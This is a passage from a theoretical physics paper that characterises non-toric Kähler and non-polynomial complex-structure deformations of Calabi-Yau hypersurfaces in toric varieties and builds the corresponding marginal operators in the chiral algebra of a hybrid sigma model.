G}_{\beta\overline{\beta}}\eta^{\beta}_{\overline{\alpha}}-{\cal G}_{\beta\overline{\alpha}}\eta^{\beta}_{\overline{\beta}}=\nabla_{\overline{\beta}}\rho_{\overline{\alpha}}-\nabla_{\overline{\alpha}}\rho_{\overline{\beta}}. \tag{30}\] We can therefore set \(\lambda^{\beta}={\cal G}^{\overline{\beta}\beta}\rho_{\overline{\beta}}\). We have shown that every cohomology class \([\eta]\in H^{0,1}_{\bar{\partial}}(Y,T_{Y})\) has a representative \(\eta\) satisfying (27); we can change the representative to \(\eta^{\prime}=\eta+\bar{\partial}\lambda\), which will also satisfy (27) if and only if \(\lambda\) obeys \[\nabla_{\overline{\beta}}(\lambda^{\beta}{\cal G}_{\beta\overline{\alpha}})-\nabla_{\overline{\alpha}}(\lambda^{\beta}{\cal G}_{\beta\overline{\beta}})=0. \tag{31}\] On \(Y\) this is only possible if \(\lambda^{\beta}=\nabla^{\beta}f\) for some function \(f\). Coming back to the form of the deformation, we see that such a shift amounts to \(\omega_{\overline{\alpha}\overline{\beta}}\to\omega_{\overline{\alpha}\overline{\beta}}+\nabla_{\overline{\alpha}}\nabla_{\overline{\beta}}f\). 
Using our equations of motion we have \[\overline{\cal D}\,\overline{\cal D}^{\prime}f=\overline{\cal D}\left[\nabla_{\overline{\beta}}f\,\overline{\cal D}^{\prime}\overline{\cal Y}^{\overline{\beta}}\right]=\partial_{\overline{\alpha}}\left(\nabla_{\overline{\beta}}f\right)\overline{\cal D}\,\overline{\cal Y}^{\overline{\alpha}}\,\overline{\cal D}^{\prime}\overline{\cal Y}^{\overline{\beta}}+\nabla_{\overline{\beta}}f\,\overline{\cal D}\,\overline{\cal D}^{\prime}\overline{\cal Y}^{\overline{\beta}}=\nabla_{\overline{\alpha}}\nabla_{\overline{\beta}}f\,\overline{\cal D}\,\overline{\cal Y}^{\overline{\alpha}}\,\overline{\cal D}^{\prime}\overline{\cal Y}^{\overline{\beta}}. \tag{32}\] So, the remaining freedom in shifting the representative of \([\eta]\) yields an irrelevant D-term deformation. We have recovered the other familiar result: \(T_{{\cal M}^{\rm cc}}\simeq H^{0,1}_{\bar{\partial}}(Y,T_{Y})\). It is not surprising that we have reproduced the expected structure for the first order deformations of a large radius non-linear sigma model, because the supposition is that this Lagrangian theory is indeed superconformal for an appropriately chosen Kahler metric \({\cal G}\). We note that the two types of deformation differ in one important aspect: we did not use the equations of motion in discussing the (a,c) deformations, and, indeed, there is no issue with adding to the action a small but finite (a,c) deformation of the form above. This will shift the complexified Kahler class of the theory, and of course the action so obtained is equivalent to one with a new Kahler potential \({\cal K}_{\rm new}\). On the other hand, the (c,c) deformation as we have written it is only infinitesimal because the supersymmetry requirements only hold up to equations of motion. This is easy to understand: the action written in terms of a choice of chiral superfields uses a fixed complex structure, so while the deformation is certainly integrable (either in the sense of complex geometry or superconformal field theory), we cannot hope to express the form of a finite deformation in terms of the original chiral superfields. ### A chiral algebra perspective Before we leave this warm-up exercise, we point out one more perspective that will be useful to us below, a view based on the chiral algebra of the theory, which we can think of as the cohomology of \(\overline{\cal D}\).8 This is a structure that exists in any (0,2) quantum field theory, and in favorable circumstances we can assume that it is isomorphic to the cohomology of the right-moving supercharge \(G^{+}_{-1/2}\) of the IR SCFT. In the case of the (2,2) theories that we consider, the \(\overline{\cal D}\) cohomology contains a holomorphic N=2 superconformal algebra that includes a representative of the U(1)\({}_{\rm L}\) current [22]. We will assume that in the IR this algebra indeed becomes the left-moving superconformal algebra. Footnote 8: Foundational papers on this structure in two-dimensional theories include [34; 35; 36]. The structure has a close relationship to the chiral de Rham complex [37] and its generalizations. It has been explored more recently in the context of Landau-Ginzburg models in [38] and in hybrid CFTs in [22; 39]. A pedagogical discussion is given in [6], and subtleties in (0,2) applications are pointed out in [27]. This offers a straightforward way to identify representatives of marginal (a,c) and (c,c) operators: we merely need to identify the cohomology classes of operators with \(q_{\mbox{\tiny R}}=+1\), \(q_{\mbox{\tiny L}}=\pm 1\), and spin 0. 
If our assumption about the RG flow is correct, then each such cohomology class corresponds in the SCFT to a chiral primary operator on the right with \(q_{\mbox{\tiny R}}=+1\). Since the RG flow preserves the spin \(h_{\mbox{\tiny L}}-h_{\mbox{\tiny R}}=0\), we also have \[h_{\mbox{\tiny L}}=h_{\mbox{\tiny R}}=\tfrac{1}{2}q_{\mbox{\tiny R}}=\tfrac{1}{2}. \tag{33}\] Since \(q_{\mbox{\tiny L}}=\pm 1\), the operator must therefore either be anti-chiral primary on the left (\(q_{\mbox{\tiny L}}=-1\)) or chiral primary on the left (\(q_{\mbox{\tiny L}}=+1\)). It is a simple exercise to apply this to the (a,c) and (c,c) deformations of the classical non-linear sigma model and reproduce the results we reviewed above. However, the point for us is that studying the chiral algebra will be much simpler in the massive theories that are our main interest. Although we will not pursue this in this work, it is important to keep in mind that this identification is computationally powerful. For example, it allows us to evaluate correlation functions and OPEs of these operators in a half-twisted theory, and these computations are essentially as powerful as similar computations in a topologically twisted theory [6; 40], at least at genus 0. Denoting by \(\mathcal{H}_{\overline{\mathcal{D}}}\) the full chiral algebra of the theory, we are then interested in characterizing the subspaces \(\mathcal{H}_{\overline{\mathcal{D}}}^{\rm ac}\) and \(\mathcal{H}_{\overline{\mathcal{D}}}^{\rm cc}\) corresponding to spin 0 operators with \(q_{\mbox{\tiny L}}\), \(q_{\mbox{\tiny R}}\) as described above. These vector spaces have subspaces defined by the toric and polynomial deformations: \[\mathcal{H}_{\overline{\mathcal{D}}}^{\rm toric}\subseteq\mathcal{H}_{\overline{\mathcal{D}}}^{\rm ac}\,\qquad\mathcal{H}_{\overline{\mathcal{D}}}^{\rm poly}\subseteq\mathcal{H}_{\overline{\mathcal{D}}}^{\rm cc}. \tag{34}\] Non-toric and non-polynomial deformations are then naturally thought of as equivalence classes belonging to, respectively, the quotient vector spaces \(\mathcal{H}_{\overline{\mathcal{D}}}^{\rm ac}/\mathcal{H}_{\overline{\mathcal{D}}}^{\rm toric}\) and \(\mathcal{H}_{\overline{\mathcal{D}}}^{\rm cc}/\mathcal{H}_{\overline{\mathcal{D}}}^{\rm poly}\), and our goal is to provide an appropriate operator for each equivalence class. ## 3 Hypersurface geometry In this section we use a geometric perspective to characterize the deformations for a special class of Calabi-Yau manifolds: \(X\) is a smooth hypersurface in a projective and simplicial 4-dimensional NEF Fano toric variety \(V\) with at worst terminal singularities. Recall that a variety \(V\) is NEF Fano if and only if it is complete, and its anti-canonical divisor \(-K_{V}\) is NEF, i.e. has a non-negative intersection with every curve in \(V\). Moreover, \(V\) is a Gorenstein variety, and its only singularities are terminal Gorenstein singularities which occur in codimension 4 [14]: these singularities are missed by a generic hypersurface. We focus on this class because it contains an enormous set of examples [41] with a simple combinatorial description, a canonical lift to a UV gauged linear sigma model [12], and a beautiful mirror construction [10]. Moreover, there is a concrete description of the deformation spaces and their splits into toric/non-toric and polynomial/non-polynomial sets. 
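A standard example to keep in mind, though one in which the non-toric and non-polynomial pieces are absent, is the quintic \(X\subset V=\mathbb{P}^{4}\). There the familiar counting \[\dim H^{0}(\mathbb{P}^{4},{\cal O}(5))-\dim\mathrm{GL}(5,\mathbb{C})=\binom{9}{4}-25=126-25=101=h^{1,2}(X)\] shows that every complex structure deformation is polynomial, while \(h^{1,1}(X)=1\) is generated by the restriction of the hyperplane class and is toric. For more general \(V\) in the class just described both quotients can be non-trivial, and it is those deformations that we wish to describe in the UV theory. 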
The characterization of the deformations was crucial for early tests of mirror symmetry in this construction [10; 13], but instead of giving the usual treatment--for example reviewed in [14]--we will give a presentation that is well-suited for our purposes following a method given in [42]. ### A little toric geometry We begin by setting notation and summarizing a few key results in toric geometry, mostly following the excellent text [43]. Fix a \(d\)-dimensional lattice \(N\simeq\mathbb{Z}^{d}\). Let \(V\) be a projective simplicial toric variety with fan \(\Sigma_{V}\subset N_{\mathbb{R}}=N\otimes_{\mathbb{Z}}\mathbb{R}\). Denote by \(\Sigma_{V}(1)\) the collection of 1-dimensional cones, indexed by the primitive generators \(u_{\rho}\in N\), with \(\rho=1,\ldots,n=|\Sigma_{V}(1)|\). In terms of the homogeneous Cox coordinates, for every \(\rho\) there is a homogeneous coordinate \(Z_{\rho}\) for \(\mathbb{C}^{n}\), and we can describe \(V\) as a quotient \[V=\left\{\mathbb{C}^{n}\setminus F\right\}/\left\{(\mathbb{C}^{*})^{n-d} \times H\right\}\, \tag{3.1}\] where \(H\) is a finite abelian group, \(F\) is a union of intersections of hyperplanes determined by the fan, and the \(\mathbb{C}^{*}\) action is encoded in a matrix of charges \(\mathbf{q}\). The toric divisors \(D_{\rho}\), obtained as projections of the loci \(\left\{\mathbb{Z}_{\rho}=0\right\}\) will play an important role in our story. We note two key properties: 1. the canonical divisor of the toric variety is given by \[K_{V}=-\sum_{\rho}D_{\rho}\ ;\] (3.2) 2. each toric divisor is Cartier, and the group of line bundles \(\operatorname{Pic}(V)\) is generated by the corresponding line bundles \(\mathcal{O}_{V}(D_{\rho})\), where \(\mathcal{O}_{V}\) is the structure sheaf of \(V\). We set \(W=\operatorname{Pic}(V)\otimes_{\mathbb{Z}}\mathbb{C}\). The tangent sheaf \(T_{V}\) and the cotangent sheaf \(\Omega^{1}_{V}\) fit into the exact sequences9 Footnote 9: When \(V\) is smooth, these sheaves have their usual geometric meaning. More generally, when \(V\) is a projective and simplicial, these sheaves should be understood as the appropriate generalizations of the geometric objects. A careful discussion is given in [43]. \[\begin{CD}0@>{}>{}>W^{*}\otimes\mathcal{O}_{V}@>{E}>{}>\bigoplus_{\rho} \mathcal{O}_{V}(D_{\rho})@>{}>{}>T_{V}@>{}>{}>0\,\\ \\ 0@>{}>{}>\Omega^{1}_{V}@>{}>{}>\bigoplus_{\rho}\mathcal{O}_{V}(-D_{\rho})@>{E ^{T}}>{}>W\otimes\mathcal{O}_{V}@>{}>{}>0\,\end{CD} \tag{3.3}\] where the map \(E\) is given by \[E(v)=\left(v\cdot\mathbf{q}_{1}Z_{1},v\cdot\mathbf{q}_{2}Z_{2},\ldots,v\cdot \mathbf{q}_{n}Z_{n}\right). \tag{3.4}\] Using these exact sequences it is possible to prove a number of remarkable vanishing theorems that hold for NEF Fano simplicial toric varieties, including10 Footnote 10: Proofs and details of these theorems can be found in chapter 9 of [43]. \[H^{p}(V,\Omega_{V}^{q})=0\qquad\text{for }p\neq q\, \tag{3.5}\] and for any NEF divisor \(D\) on \(V\) \[H^{p}(V,\mathcal{O}_{V}(D))=0\qquad\text{for }p>0. \tag{3.6}\] We will often use these vanishing results together with Serre duality (which holds since \(V\) is Gorenstein): \[H^{p}(V,\mathcal{E})\simeq\overline{H^{d-p}(V,\mathcal{E}^{*} \otimes\mathcal{O}_{V}(K_{V}))}. \tag{3.7}\] Using these results we can prove another vanishing result that will play an important role in what follows: \[H^{i}(V,\mathcal{O}_{V}(-D_{\rho}))=0. \tag{3.8}\] This can be seen as follows. 
First we observe that \(H^{0}(V,\mathcal{O}_{V}(-D_{\rho}))=0\) because given a section \(\lambda\in H^{0}(V,\mathcal{O}_{V}(-D_{\rho}))\) we would obtain a non-constant section \(Z_{\rho}\lambda\in H^{0}(V,\mathcal{O}_{V})\), which is impossible on a projective variety. Next, the cotangent sheaf exact sequence leads to a long exact sequence in cohomology which includes \[H^{i}(V,\Omega^{1}_{V})\xrightarrow{}\bigoplus_{\rho}H^{i}(V,\mathcal{O}_{V}(-D_{\rho}))\xrightarrow{}W\otimes H^{i}(V,\mathcal{O}_{V})\, \tag{3.9}\] so that using (3.5) we see \(H^{i}(V,\mathcal{O}_{V}(-D_{\rho}))=0\) for \(i\geq 2\). The remaining part of the long exact sequence is \[0\xrightarrow{}W\otimes H^{0}(V,\mathcal{O}_{V})\xrightarrow{}H^{1}(V,\Omega^{1}_{V})\xrightarrow{}\bigoplus_{\rho}H^{1}(V,\mathcal{O}_{V}(-D_{\rho}))\xrightarrow{}W\otimes H^{1}(V,\mathcal{O}_{V})=0\, \tag{3.10}\] but since the first two terms are isomorphic for a projective simplicial toric variety, the desired result holds for \(i=1\) as well. ### Complex structure deformations We set \(X=\{P=0\}\subset V\), where \(P\) is a generic holomorphic section of the anticanonical bundle: \(P\in H^{0}(V,\mathcal{O}_{V}(-K_{V}))\). We reviewed above that \(T_{\mathcal{M}^{\text{cc}}}\simeq H^{1}(X,T_{X})\). Our goal now is to describe \(H^{1}(X,T_{X})\) for the hypersurface in a way that explicitly identifies the polynomial and non-polynomial deformations. In this section we closely follow [42]. The first step is to observe that the adjunction sequence together with the Euler sequence of (3.3) imply that the tangent sheaf \(T_{X}\) is obtained as the cohomology of the complex \[\mathcal{E}^{\bullet}=0\xrightarrow{}W^{*}\otimes\mathcal{O}_{X}\xrightarrow{E}\underbrace{\bigoplus_{\rho}\mathcal{O}_{X}(D_{\rho})}_{=\mathcal{E}^{0}}\xrightarrow{dP}\mathcal{O}_{X}(-K_{V})\xrightarrow{}0. \tag{3.11}\] This complex is exact except at the \(0\)-th position, and when \(V\) is smooth it has the interpretation that vectors on \(X\) are the vectors on \(V\) that preserve the hypersurface.11 The sheaves on \(X\) that show up in (3.11) are obtained by pulling back divisors from \(V\) to \(X\), and are related to sheaves on \(V\) through the exact sequence Footnote 11: This is familiar to gauged linear sigma model experts, making its appearance in that context already in [5]. \[0\xrightarrow{}\mathcal{O}_{V}(D+K_{V})\xrightarrow{}\mathcal{O}_{V}(D)\xrightarrow{}\mathcal{O}_{X}(D)\xrightarrow{}0. \tag{3.12}\] The total cohomology, also known as hypercohomology, of the complex \(\mathcal{E}^{\bullet}\), calculated by a spectral sequence whose first page is \(E_{1}^{p,q}=H^{q}(X,\mathcal{E}^{p})\), converges to \(H^{p+q}(X,\mathcal{E}^{\bullet})\). Since \(T_{X}\) is obtained as the ordinary cohomology of \(\mathcal{E}^{\bullet}\), which fails to be exact just at the middle \(\mathcal{E}^{0}\) term, this gives a method for calculating \(H^{1}(X,T_{X})\). In more detail, the first page of the spectral sequence only has non-zero entries for \(|p|\leq 1\), namely \(E_{1}^{-1,q}=W^{*}\otimes H^{q}(X,\mathcal{O}_{X})\), \(E_{1}^{0,q}=\bigoplus_{\rho}H^{q}(X,\mathcal{O}_{X}(D_{\rho}))\), and \(E_{1}^{1,q}=H^{q}(X,\mathcal{O}_{X}(-K_{V}))\). The entries in the right column with \(q>0\) vanish by combining (3.12) with (3.5) and (3.6), while the entries in the left column with \(q=1,2\) vanish because \(X\) is Calabi-Yau. The bottom row then encodes the polynomial deformations, while the first row contributes \(\bigoplus_{\rho}H^{1}(X,\mathcal{O}_{X}(D_{\rho}))\) to \(H^{1}(X,T_{X})\). While this result was given in [42], we will next take it a step further and show \[T_{\mathcal{M}^{\rm cc}}/\left.T_{\mathcal{M}^{\rm cc}}\right|_{\rm poly}=\bigoplus_{\rho}H^{1}(X,\mathcal{O}_{X}(D_{\rho}))=H^{1}(V,T_{V})\, \tag{3.14}\] i.e. the non-polynomial deformations of the hypersurface \(X\subset V\) are exactly the deformations of complex structure of the ambient variety \(V\)--a satisfying result that was already obtained through a somewhat different approach in [44]. 
To prove the desired isomorphism we note that Serre duality and (3.8) imply that \(H^{i}(V,\mathcal{O}_{V}(D_{\rho}+K_{V}))=0\) for all \(i\). This in turn implies via (3.12) that \(H^{i}(X,\mathcal{O}_{X}(D_{\rho}))=H^{i}(V,\mathcal{O}_{V}(D_{\rho}))\). Finally, taking the long exact sequence associated to the Euler sequence for the tangent sheaf on \(V\), the result follows. ### Complexified Kahler deformations While the results in the previous section were a review of previous work, reproducing a known result from a somewhat different point of view, we will now apply the same machinery to discuss the toric and non-toric complexified Kahler deformations, which to the best of our knowledge have not been previously considered from this point of view. The conventional view on these deformations is obtained in three statements [14]. First, we observe that given the inclusion \(i:X\hookrightarrow V\) we can pull back divisors on \(V\) to those on \(X\). However, some divisors on \(V\) do not intersect \(X\), and these pull back to \(0\) (up to linear equivalence) on \(X\). Taking this into account we obtain the toric divisors on \(X\) and then of course also the corresponding classes in \(H^{1}(X,\Omega^{1}_{X})\). Finally, it can be that some of the toric divisors become reducible when pulled back to \(X\), leading to independent complexified Kahler deformations on \(X\) that cannot be obtained by pulling back a complexified Kahler class from \(V\). We will instead follow a different approach to describe the non-toric deformations directly in terms of properties of \(V\). The idea is simple: we can apply exactly the methods of the previous section but now to the cotangent sheaf represented as the cohomology of the complex \[\mathcal{F}^{\bullet}=0\xrightarrow{}\mathcal{O}_{X}(K_{V})\xrightarrow{dP}\underbrace{\bigoplus_{\rho}\mathcal{O}_{X}(-D_{\rho})}_{=\mathcal{F}^{0}}\xrightarrow{E^{T}}W\otimes\mathcal{O}_{X}\xrightarrow{}0. \tag{3.15}\] The first page of the spectral sequence for the total cohomology of \(\mathcal{F}^{\bullet}\) again has non-zero entries only for \(|p|\leq 1\), namely \(E_{1}^{-1,q}=H^{q}(X,\mathcal{O}_{X}(K_{V}))\), \(E_{1}^{0,q}=\bigoplus_{\rho}H^{q}(X,\mathcal{O}_{X}(-D_{\rho}))\), and \(E_{1}^{1,q}=W\otimes H^{q}(X,\mathcal{O}_{X})\). This time it is the entries in the left column with \(q\leq 2\) that vanish by combining (3.12) with (3.5) and (3.6), while the entries in the right column with \(q=1,2\) vanish because \(X\) is Calabi-Yau. The bottom row encodes the toric deformations, while from the first row we obtain \[T_{\mathcal{M}^{\text{ac}}}/\left.T_{\mathcal{M}^{\text{ac}}}\right|_{\text{toric}}=\bigoplus_{\rho}H^{1}(X,\mathcal{O}_{X}(-D_{\rho}))=H^{2}(V,\Omega^{1}_{V}\otimes\mathcal{O}_{V}(K_{V})). \tag{3.16}\] The last isomorphism can be obtained in two steps. First, the long exact sequence associated to (3.12) with \(D=-D_{\rho}\) and the vanishing (3.8) yield the isomorphism \[H^{1}(X,\mathcal{O}_{X}(-D_{\rho}))=H^{2}(V,\mathcal{O}_{V}(-D_{\rho})\otimes\mathcal{O}_{V}(K_{V})). \tag{3.17}\] Next, taking the cotangent sheaf exact sequence and tensoring with \(\mathcal{O}_{V}(K_{V})\) we obtain the exact sequence \[0\xrightarrow{}\Omega^{1}_{V}\otimes\mathcal{O}_{V}(K_{V})\xrightarrow{}\bigoplus_{\rho}\mathcal{O}_{V}(-D_{\rho})\otimes\mathcal{O}_{V}(K_{V})\xrightarrow{}W\otimes\mathcal{O}_{V}(K_{V})\xrightarrow{}0\, \tag{3.18}\] and since by Serre duality \(H^{i}(V,\mathcal{O}_{V}(K_{V}))=0\) for \(i\neq 4\), the associated long exact sequence yields the claimed isomorphism. 
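As a quick consistency check of (3.14) and (3.16), take \(V=\mathbb{P}^{4}\) and \(X\) the quintic. The Euler sequence \(0\to{\cal O}_{V}\to{\cal O}_{V}(1)^{\oplus 5}\to T_{V}\to 0\), together with the vanishing of \(H^{q}(\mathbb{P}^{4},{\cal O}(1))\) and \(H^{q}(\mathbb{P}^{4},{\cal O})\) for \(q>0\), gives \(H^{1}(V,T_{V})=H^{2}(V,T_{V})=0\), while Serre duality (3.7) identifies \(H^{2}(V,\Omega^{1}_{V}\otimes{\cal O}_{V}(K_{V}))\simeq H^{2}(V,T_{V})^{*}\). Both quotients therefore vanish, consistent with the statement above that all deformations of the quintic are polynomial and toric. 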
## 4 Marginal operators in the hypersurface hybrid In the previous section we obtained a characterization of the non-toric and non-polynomial deformations of a hypersurface \(X\subset V\): \[T_{\mathcal{M}^{\text{cc}}}/\left.T_{\mathcal{M}^{\text{cc}}}\right|_{\text{ poly}}=H^{1}(V,T_{V})\,\qquad T_{\mathcal{M}^{\text{ac}}}/\left.T_{\mathcal{M}^{\text{ac}}}\right|_ {\text{toric}}=H^{2}(V,\Omega^{1}_{V}\otimes\mathcal{O}_{V}(K_{V})). \tag{4.1}\] We will now use this characterization to find \(\overline{D}\) cohomology classes in the hybrid theory that represent each type of deformation. We will make a stronger assumption that \(V\) is smooth. This is the simplest setting for hybrid theories, since then the base degrees of freedom can be described by a smooth non-linear sigma model. The gauged linear sigma model suggests that it should be possible to extend the analysis to any simplicial NEF Fano toric variety \(V\), but we will not pursue this extension here. At any rate even assuming that \(V\) is smooth leaves us with plenty of examples with non-toric and non-polynomial deformations. ### The Lagrangian of the hypersurface hybrid Let \(L={\cal O}_{V}(K_{V})\) and take \(Y\) to be the total space of the line bundle \(L\), with projection \(\pi:Y\to V\). The fibration gives us a way to construct the action patch by patch. Suppose \(\{{\mathfrak{U}}_{a}\}_{a\in I}\) is a cover for \(V\), with \({\mathfrak{U}}_{a}\simeq{\mathbb{C}}^{4}\) with local holomorphic coordinates \(u^{i}\) and their complex conjugates \(\overline{u}^{\overline{i}}\). We can then cover \(Y\) with patches \({\mathfrak{U}}_{a}\times{\mathbb{C}}\), and denote the fiber coordinate by \(\phi\). The hybrid superfields are obtained by promoting the holomorphic coordinates just described to chiral superfields \(U^{i}\) and \(\Phi\), and their conjugates to anti-chiral superfields \(\overline{U}^{\overline{i}}\), \(\overline{\Phi}\). To make a connection with the previous description we can set \({\cal Y}^{0}=\Phi\) and \({\cal Y}^{i}=U^{i}\). To specify the hybrid action (8) we choose a superpotential \({\cal W}=\Phi P\), where \(P\) is obtained by pulling back a section of the dual bundle \(L^{*}\), and we observe that the geometry has a natural vector field \(v=\phi\frac{\partial}{\partial\phi}\) which assigns charge \(+1\) to \(\Phi\) and leaves the \(U^{i}\) invariant. Thus, if we can pick a Kahler metric for which \(v\) generates an isometry, the action will have a \(\mathrm{U}(1)_{\mathrm{L}}\times\mathrm{U}(1)_{\mathrm{R}}\) symmetry. Moreover, the symmetry will be anomaly-free since by construction \(Y\) has a trivial canonical bundle. To describe the Kahler potential further, we pick a Hermitian metric on \(L\), that is a positive section \(h\in{\cal A}^{0,0}_{V}(L^{*}\otimes\overline{L}^{*})\). The most general Kahler potential consistent with the isometry generated by \({\cal L}_{v}\) is then \[{\cal K}={\cal K}(u,\overline{u},{\cal R})\, \tag{10}\] where \({\cal R}=\phi h(u,\overline{u})\overline{\phi}\). To leading order in the fiber direction \[{\cal K}=\phi h\overline{\phi}+{\cal K}_{\rm base}(u,\overline{u})+O({\cal R} ^{2})\, \tag{11}\] where \({\cal K}_{\rm base}\) is a Kahler potential for a Kahler metric on the base \(V\). Using the metric \(h\) we define the Chern connection \(A=\partial\log h\) on the bundle \(L\), as well as its conjugate \(\overline{A}=\bar{\partial}\log h\). 
These connections have Hermitian curvature \(F\in{\cal A}^{1,1}_{V}\), with \[\partial A=0\,\qquad\qquad\bar{\partial}\overline{A}=0\,\qquad\qquad\bar{ \partial}A=-\partial\overline{A}=F=F_{i\overline{j}}du^{i}\wedge d\overline{u} ^{\overline{j}}\, \tag{12}\] where \(F_{i\overline{j}}=-\partial_{\overline{j}}A_{i}\) satisfies \(\overline{F_{i\overline{j}}}=F_{i\overline{j}}\). All of these pull back to \(Y\), so that for example \(\pi^{*}(h)\) gives a metric on the pullback bundle \(L_{\rm v}=\pi^{*}(L)\). To keep the notation reasonably uncluttered we will not write the pullbacks explicitly in what follows unless it is likely to cause confusion. When derived from a linear sigma model the Kahler potential \({\cal K}\) is determined in terms of a solution to \(|\Sigma_{V}(1)|-\dim V\) algebraic equations on each affine patch, but we will not need the explicit details of this metric. We remark that in keeping with the hybrid philosophy really any choice of smooth \({\cal K}\) should do, but a canonical choice is not readily available for a general NEF Fano \(V\). If \(V\) is Fano, then we can choose \({\cal K}=\phi h\overline{\phi}+{\cal K}_{\rm base}(u,\overline{u})\) because it is possible to find a smooth metric \(h\) so that the curvature \(F\) has positive eigenvalues at every point on the base, and the resulting Kahler form is non-degenerate on \(Y\). However, for a general NEF (as opposed to ample) line bundle it is not possible to choose such a metric \(h\)[45], and this simple Kahler potential will lead to a degenerate Kahler form. Having set up this basic machinery, we will now construct representatives in the \(\overline{\cal D}\) cohomology \({\cal H}_{\overline{\cal D}}\) of the hybrid theory for each of the (a,c) and (c,c) deformations identified above. We will work at the level of classical field theory, but we expect our results to be robust at the level of the chiral algebra. ### The toric (a,c) deformations With a little more diagram chasing, it is not hard to see that the toric (a,c) deformations are described by the quotient \(H^{1}(V,\Omega^{1}_{V})/H^{1}(V,\Omega^{1}_{V}\otimes L)\), where the map \(H^{1}(V,\Omega^{1}_{V}\otimes L)\to H^{1}(V,\Omega^{1}_{V})\) is simply multiplication by \(P\). To translate this to a statement in \(\overline{\cal D}\) cohomology we define the superfield \[\Theta=\overline{\cal D}^{\prime}{\cal K}_{\phi}=({\cal K}^{\prime}+R{\cal K}^ {\prime\prime})h\left(\overline{\cal D}^{\prime}\overline{\Phi}+\left( \overline{A}_{\overline{\imath}}+\tfrac{1}{{\cal K}+{\cal K}{\cal K}^{\prime \prime}}{\cal K}^{\prime}_{\overline{\imath}}\right)\overline{\cal D}^{\prime} \overline{U}^{\overline{\imath}}\overline{\Phi}\right). \tag{4.5}\] This is useful because the equations of motion (2.11) imply \[\overline{\cal D}\Theta=-2m{\cal W}_{\phi}=-2mP. \tag{4.6}\] Now the toric deformations are described as follows. Given \([\omega]\in H^{1}(V,\Omega^{1}_{V})\) with representative \(\omega\), we set \[{\cal O}^{\rm toric}[\omega]=\omega_{i\overline{\jmath}}{\cal D}^{\prime}U^{i }\overline{\cal D}\overline{U}^{\overline{\jmath}}. \tag{4.7}\] This is clearly \(\overline{\cal D}\)-closed, and shifting \(\omega\) by a \(\bar{\partial}\)-exact form leads to a \(\overline{\cal D}\)-exact shift of \({\cal O}^{\rm ac}_{\rm toric}[\omega]\). Thus, we have a well-defined map \[{\cal O}^{\rm toric}:H^{1}(V,\Omega^{1}_{V})\rightarrow{\cal H}_{\overline{ \cal D}}. 
\tag{4.8}\] However, not all of these operators define non-trivial classes in \({\cal H}_{\overline{\cal D}}\): given \([\lambda]\in H^{1}(V,\Omega^{1}_{V}\otimes L)\) with representative \(\lambda\), we can construct a well-defined operator \[-\tfrac{1}{2m}\Theta\lambda_{i\overline{j}}{\cal D}^{\prime}U^{i}\overline{\cal D}\overline{U}^{\overline{j}} \tag{4.9}\] which satisfies \[\overline{\cal D}\left(-\tfrac{1}{2m}\Theta\lambda_{i\overline{j}}{\cal D}^{\prime}U^{i}\overline{\cal D}\overline{U}^{\overline{j}}\right)=P\lambda_{i\overline{j}}{\cal D}^{\prime}U^{i}\overline{\cal D}\overline{U}^{\overline{j}}. \tag{4.10}\] So, we characterize the toric deformations as a subset of the chiral algebra \[{\cal H}^{\rm toric}_{\overline{\cal D}}=\left\{{\cal O}^{\rm toric}[\omega]\ \ |\ \ [\omega]\in H^{1}(V,\Omega^{1}_{V})/H^{1}(V,\Omega^{1}_{V}\otimes L)\right\}. \tag{4.11}\] ### The non-toric (a,c) deformations We start with a class \([\xi]\in H^{1,2}_{\bar{\partial}}(V,L)\) with representative \(\xi\). Since \(P\xi\in{\cal A}^{1,2}_{V}\) is a \(\bar{\partial}\)-closed form, and since \(H^{2}(V,\Omega^{1}_{V})=0\), there exists \(\mu\in{\cal A}^{1,1}_{V}\) such that \[P\xi=\bar{\partial}\mu. \tag{4.12}\] Any two solutions, say \(\mu\) and \(\mu^{\prime}\), will differ by (a possibly trivial) toric deformation, i.e. \([\mu-\mu^{\prime}]\in H^{1}(V,\Omega^{1}_{V})\). Given such a \(\xi\), we would like to find a \(\overline{\cal D}\)-closed local field \({\cal O}[\xi]\) with the following properties: 1. it should be linear in \(\xi\); 2. it should have spin \(0\); 3. it should have \(q_{\rm L}=-1\); 4. it should have \(q_{\rm R}=+1\); 5. it should transform trivially from patch to patch (i.e. it should be well-defined in field space). If we limit ourselves to fields constructed from the fundamental fields and their superspace derivatives, then these requirements have a unique solution of the form \[{\cal O}_{\rm guess}=(\overline{\cal D}^{\prime}\overline{\Phi}+\cdots)h\xi_{i\overline{j}\overline{k}}{\cal D}^{\prime}U^{i}\overline{\cal D}\overline{U}^{\overline{j}}\overline{\cal D}\overline{U}^{\overline{k}}\, \tag{4.13}\] where \(\cdots\) denotes connection terms that make the term in the parentheses transform covariantly with respect to bundle transformations. Such an improvement is exactly provided by the \(\Theta\) defined in the previous section, so that \[{\cal O}_{\rm guess}=\Theta\xi_{i\overline{j}\overline{k}}{\cal D}^{\prime}U^{i}\overline{\cal D}\overline{U}^{\overline{j}}\overline{\cal D}\overline{U}^{\overline{k}}. \tag{4.14}\] Because \(\xi\) is \(\bar{\partial}\)-closed it follows that \[\overline{\cal D}{\cal O}_{\rm guess}=-2mP\xi_{i\overline{j}\overline{k}}{\cal D}^{\prime}U^{i}\overline{\cal D}\overline{U}^{\overline{j}}\overline{\cal D}\overline{U}^{\overline{k}}=\overline{\cal D}\left(-4m\mu_{i\overline{j}}{\cal D}^{\prime}U^{i}\overline{\cal D}\overline{U}^{\overline{j}}\right)\, \tag{4.15}\] where the second equality follows from our observation \(P\xi=\bar{\partial}\mu\). We conclude that the field \({\cal O}_{\rm ac}[\xi]\) defined by \[{\cal O}_{\rm ac}[\xi]=\Theta\xi_{i\overline{j}\overline{k}}{\cal D}^{\prime}U^{i}\overline{\cal D}\overline{U}^{\overline{j}}\overline{\cal D}\overline{U}^{\overline{k}}+4m\mu_{i\overline{j}}{\cal D}^{\prime}U^{i}\overline{\cal D}\overline{U}^{\overline{j}} \tag{4.16}\] is \(\overline{\cal D}\)-closed and is well-defined in \({\cal H}_{\overline{\cal D}}^{\rm ac}/{\cal H}_{\overline{\cal D}}^{\rm toric}\). 
